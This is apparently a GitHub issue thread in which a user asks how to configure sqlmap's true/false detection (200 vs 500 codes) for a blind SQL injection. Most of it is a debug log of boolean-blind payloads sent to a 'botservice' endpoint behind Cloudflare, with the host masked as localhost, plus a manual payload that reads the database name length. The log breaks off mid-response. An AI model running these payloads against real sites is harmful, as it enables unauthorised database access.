True - delay, false - http error

[vayo8888]

Hello, how can i set sqlmap valid query if page have long load time (40-50 sec with code 200) and false if it got ERROR HTTP 500 after 4-5 seconds? I mean i dont want to wait this 40-50 seconds when query is true. By default sqlmap see only time-based sql injection, but manually i can count columns with simple +order+by+*--

[vayo8888]

ok, problem with delay in id parameter, for now i have another problem, sqlmap didnt see that 200 code is TRUE, --code=200 wont work.

[AmericanY]

@vayo8888

1-

2- Don't blame sqlmap if you don't know how to ask your question! such a comment is really lead to ignore response for your question. By default sqlmap see only time-based sql injection

3- the answer for your question is completely described here. https://github.com/sqlmapproject/sqlmap/wiki/Usage#page-comparison

4- sqlmap notified you several time about internal server error with http error code 500. kindly double check if there's a WAF protection ! that why you need to back to point 1.

.......

@stamparm invalid

[vayo8888]

I can count lenght of db name with "index.php?id=3800+AND+(SELECT+LENGTH(database()))=7#" (because i know name of db from Time-based) and other information from base. So here is blind injection. But sqlmap didnt see difference between 200 and 500 codes, i trying to set --code=200, but nothin works. I try --null-connection key, but no luck.

[AmericanY]

@vayo8888 post sqlmap output here in order to check the issue you talking about. and in case if your compare based on --code= , simply just add the string in order to let sqlmap split the response based on response code with the string --string=

AGAIN TAKE A LOOK

--string=STRING     String to match when query is evaluated to True
--not-string=NOT..  String to match when query is evaluated to False
--regexp=REGEXP     Regexp to match when query is evaluated to True
--code=CODE         HTTP code to match when query is evaluated to True
--text-only         Compare pages based only on the textual content
--titles            Compare pages based only on their titles

[vayo8888]

Dont understand how can i use --string if pages (true and false) fully blank, this output with --code=200 only:

`$ sqlmap.py -u "https://localhost/botservice/incoming/index.php?id=3890*" --output-dir="C:\111" --risk=3 --level=5 --random-agent --dbms=MYSQL --technique=B --batch --timeout=60 --dbs -v6 --code=200
___
H
___ [)]__ ___ ___ {1.2.5.21#dev}
|_ -| . ['] | .'| . |
|| [.]|||__,| |
||V || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:38:18

[04:38:18] [DEBUG] cleaning up configuration parameters
[04:38:18] [DEBUG] setting the HTTP Referer header to the target URL
[04:38:18] [DEBUG] setting the HTTP Host header to the target URL
[04:38:18] [DEBUG] setting the HTTP timeout
[04:38:18] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\sqlmap\txt\user-agents.txt'
[04:38:18] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)' from file 'C:\sqlmap\txt\user-agents.txt'
[04:38:18] [DEBUG] creating HTTP requests opener object
[04:38:18] [DEBUG] forcing back-end DBMS to user defined value
[04:38:19] [DEBUG] setting the HTTP Referer header to the target URL
[04:38:19] [DEBUG] setting the HTTP Host header to the target URL
[04:38:19] [WARNING] using 'C:\111' as the output directory
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:38:19] [DEBUG] used the default behavior, running in batch mode
[04:38:19] [DEBUG] resolving hostname 'localhost'
[04:38:19] [INFO] testing connection to the target URL
[04:38:19] [TRAFFIC OUT] HTTP request [#1]:
GET /botservice/incoming/index.php?id=3890 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:21] [DEBUG] declared web page charset 'utf-8'
[04:38:21] [TRAFFIC IN] HTTP response [#1] (200 OK):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Content-encoding: gzip
Transfer-encoding: chunked
Set-cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497; expires=Mon, 22-Jul-19 01:38:17 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:20 GMT
Cf-ray: 43e22fddcf984ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:21] [INFO] testing if the target URL content is stable
[04:38:21] [TRAFFIC OUT] HTTP request [#2]:
GET /botservice/incoming/index.php?id=3890 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497
Connection: close

[04:38:24] [TRAFFIC IN] HTTP response [#2] (200 OK):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Content-encoding: gzip
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:22 GMT
Cf-ray: 43e22fed6a484ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:24] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[04:38:24] [INFO] testing if URI parameter '#1*' is dynamic
[04:38:24] [PAYLOAD] 6475
[04:38:24] [TRAFFIC OUT] HTTP request [#3]:
GET /botservice/incoming/index.php?id=6475 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497
Connection: close

[04:38:26] [TRAFFIC IN] HTTP response [#3] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6475
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:25 GMT
Cf-ray: 43e22ffbdf959065-DME
Content-type: text/html; charset=UTF-8

[04:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:26] [TRAFFIC IN] HTTP response [#3] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6475
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:25 GMT
Cf-ray: 43e22ffbdf959065-DME
Content-type: text/html; charset=UTF-8

[#3] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6475
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:25 GMT
Cf-ray: 43e22ffbdf959065-DME
Content-type: text/html; charset=UTF-8

[04:38:26] [INFO] confirming that URI parameter '#1*' is dynamic
[04:38:26] [PAYLOAD] 6640
[04:38:26] [TRAFFIC OUT] HTTP request [#4]:
GET /botservice/incoming/index.php?id=6640 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497
Connection: close

[04:38:32] [TRAFFIC IN] HTTP response [#4] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6640
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:30 GMT
Cf-ray: 43e2300cdf4e4ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:32] [TRAFFIC IN] HTTP response [#4] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6640
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:30 GMT
Cf-ray: 43e2300cdf4e4ef0-DME
Content-type: text/html; charset=UTF-8

[#4] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=6640
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:30 GMT
Cf-ray: 43e2300cdf4e4ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:32] [INFO] URI parameter '#1*' is dynamic
[04:38:32] [PAYLOAD] 3890,.)",.).',
[04:38:32] [TRAFFIC OUT] HTTP request [#5]:
GET /botservice/incoming/index.php?id=3890%2C.%29%22%2C.%29.%27%2C HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497
Connection: close

[04:38:36] [TRAFFIC IN] HTTP response [#5] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%2C.%29%22%2C.%29.%27%2C
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:34 GMT
Cf-ray: 43e2302dfc294ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:36] [TRAFFIC IN] HTTP response [#5] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%2C.%29%22%2C.%29.%27%2C
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:34 GMT
Cf-ray: 43e2302dfc294ef0-DME
Content-type: text/html; charset=UTF-8

[#5] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%2C.%29%22%2C.%29.%27%2C
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:34 GMT
Cf-ray: 43e2302dfc294ef0-DME
Content-type: text/html; charset=UTF-8

[04:38:36] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[04:38:36] [PAYLOAD] 3890'WJctWm<'">IJWeGJ
[04:38:36] [TRAFFIC OUT] HTTP request [#6]:
GET /botservice/incoming/index.php?id=3890%27WJctWm%3C%27%22%3EIJWeGJ HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Cookie: __cfduid=dba0025aa461490d0497d50d7c811d6df1532223497
Connection: close

[04:38:41] [TRAFFIC IN] HTTP response [#6] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27WJctWm%3C%27%22%3EIJWeGJ
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:40 GMT
Cf-ray: 43e230482d1b9059-DME
Content-type: text/html; charset=UTF-8

[04:38:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:41] [TRAFFIC IN] HTTP response [#6] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27WJctWm%3C%27%22%3EIJWeGJ
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:40 GMT
Cf-ray: 43e230482d1b9059-DME
Content-type: text/html; charset=UTF-8

[#6] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27WJctWm%3C%27%22%3EIJWeGJ
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:40 GMT
Cf-ray: 43e230482d1b9059-DME
Content-type: text/html; charset=UTF-8

[04:38:41] [INFO] testing for SQL injection on URI parameter '#1*'
[04:38:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:38:41] [PAYLOAD] 3890) AND 4152=5903-- FrGd
[04:38:41] [TRAFFIC OUT] HTTP request [#7]:
GET /botservice/incoming/index.php?id=3890%29%20AND%204152%3D5903--%20FrGd HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:43] [TRAFFIC IN] HTTP response [#7] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d39e8b209f6936d99bdd2eb29d2c8acbe1532223520; expires=Mon, 22-Jul-19 01:38:40 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204152%3D5903--%20FrGd
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:42 GMT
Cf-ray: 43e230691c214eea-DME
Content-type: text/html; charset=UTF-8

[04:38:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:43] [TRAFFIC IN] HTTP response [#7] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d39e8b209f6936d99bdd2eb29d2c8acbe1532223520; expires=Mon, 22-Jul-19 01:38:40 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204152%3D5903--%20FrGd
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:42 GMT
Cf-ray: 43e230691c214eea-DME
Content-type: text/html; charset=UTF-8

[#7] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d39e8b209f6936d99bdd2eb29d2c8acbe1532223520; expires=Mon, 22-Jul-19 01:38:40 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204152%3D5903--%20FrGd
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:42 GMT
Cf-ray: 43e230691c214eea-DME
Content-type: text/html; charset=UTF-8

[04:38:43] [PAYLOAD] 3890) AND 7063=7063-- vHSY
[04:38:43] [TRAFFIC OUT] HTTP request [#8]:
GET /botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063--%20vHSY HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:48] [TRAFFIC IN] HTTP response [#8] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=daf98cad37c690e5417935b8c8bda4ee71532223522; expires=Mon, 22-Jul-19 01:38:42 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063--%20vHSY
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:46 GMT
Cf-ray: 43e23077cc4b4e6c-DME
Content-type: text/html; charset=UTF-8

[04:38:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:48] [TRAFFIC IN] HTTP response [#8] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=daf98cad37c690e5417935b8c8bda4ee71532223522; expires=Mon, 22-Jul-19 01:38:42 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063--%20vHSY
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:46 GMT
Cf-ray: 43e23077cc4b4e6c-DME
Content-type: text/html; charset=UTF-8

[#8] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=daf98cad37c690e5417935b8c8bda4ee71532223522; expires=Mon, 22-Jul-19 01:38:42 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063--%20vHSY
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:46 GMT
Cf-ray: 43e23077cc4b4e6c-DME
Content-type: text/html; charset=UTF-8

[04:38:48] [PAYLOAD] 3890') AND 7154=7070-- JlXq
[04:38:48] [TRAFFIC OUT] HTTP request [#9]:
GET /botservice/incoming/index.php?id=3890%27%29%20AND%207154%3D7070--%20JlXq HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:50] [TRAFFIC IN] HTTP response [#9] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7185166dda21eb8d625cad1c4c4f27f11532223526; expires=Mon, 22-Jul-19 01:38:46 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207154%3D7070--%20JlXq
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:49 GMT
Cf-ray: 43e23092ac074e18-DME
Content-type: text/html; charset=UTF-8

[04:38:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:50] [TRAFFIC IN] HTTP response [#9] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7185166dda21eb8d625cad1c4c4f27f11532223526; expires=Mon, 22-Jul-19 01:38:46 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207154%3D7070--%20JlXq
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:49 GMT
Cf-ray: 43e23092ac074e18-DME
Content-type: text/html; charset=UTF-8

[#9] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7185166dda21eb8d625cad1c4c4f27f11532223526; expires=Mon, 22-Jul-19 01:38:46 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207154%3D7070--%20JlXq
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:49 GMT
Cf-ray: 43e23092ac074e18-DME
Content-type: text/html; charset=UTF-8

[04:38:50] [PAYLOAD] 3890') AND 7063=7063-- RbPP
[04:38:50] [TRAFFIC OUT] HTTP request [#10]:
GET /botservice/incoming/index.php?id=3890%27%29%20AND%207063%3D7063--%20RbPP HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:53] [TRAFFIC IN] HTTP response [#10] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=df06b0c054cc99ac95a0eec49ba81d7dc1532223529; expires=Mon, 22-Jul-19 01:38:49 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207063%3D7063--%20RbPP
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:52 GMT
Cf-ray: 43e230a08a364e6c-DME
Content-type: text/html; charset=UTF-8

[04:38:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:53] [TRAFFIC IN] HTTP response [#10] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=df06b0c054cc99ac95a0eec49ba81d7dc1532223529; expires=Mon, 22-Jul-19 01:38:49 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207063%3D7063--%20RbPP
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:52 GMT
Cf-ray: 43e230a08a364e6c-DME
Content-type: text/html; charset=UTF-8

[#10] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=df06b0c054cc99ac95a0eec49ba81d7dc1532223529; expires=Mon, 22-Jul-19 01:38:49 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%207063%3D7063--%20RbPP
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:52 GMT
Cf-ray: 43e230a08a364e6c-DME
Content-type: text/html; charset=UTF-8

[04:38:53] [PAYLOAD] 3890' AND 6118=5206-- rDyX
[04:38:53] [TRAFFIC OUT] HTTP request [#11]:
GET /botservice/incoming/index.php?id=3890%27%20AND%206118%3D5206--%20rDyX HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:56] [TRAFFIC IN] HTTP response [#11] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd1ddb9a8c1d9bf9180f23fa71883dc531532223532; expires=Mon, 22-Jul-19 01:38:52 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%206118%3D5206--%20rDyX
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:55 GMT
Cf-ray: 43e230b50c6a4ee4-DME
Content-type: text/html; charset=UTF-8

[04:38:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:56] [TRAFFIC IN] HTTP response [#11] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd1ddb9a8c1d9bf9180f23fa71883dc531532223532; expires=Mon, 22-Jul-19 01:38:52 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%206118%3D5206--%20rDyX
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:55 GMT
Cf-ray: 43e230b50c6a4ee4-DME
Content-type: text/html; charset=UTF-8

[#11] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd1ddb9a8c1d9bf9180f23fa71883dc531532223532; expires=Mon, 22-Jul-19 01:38:52 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%206118%3D5206--%20rDyX
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:55 GMT
Cf-ray: 43e230b50c6a4ee4-DME
Content-type: text/html; charset=UTF-8

[04:38:56] [PAYLOAD] 3890' AND 7063=7063-- JKpV
[04:38:56] [TRAFFIC OUT] HTTP request [#12]:
GET /botservice/incoming/index.php?id=3890%27%20AND%207063%3D7063--%20JKpV HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:38:59] [TRAFFIC IN] HTTP response [#12] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd90b88df2097c0a5537aa7cd7de655e81532223535; expires=Mon, 22-Jul-19 01:38:55 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%207063%3D7063--%20JKpV
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:58 GMT
Cf-ray: 43e230c8bcf14e18-DME
Content-type: text/html; charset=UTF-8

[04:38:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:38:59] [TRAFFIC IN] HTTP response [#12] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd90b88df2097c0a5537aa7cd7de655e81532223535; expires=Mon, 22-Jul-19 01:38:55 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%207063%3D7063--%20JKpV
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:58 GMT
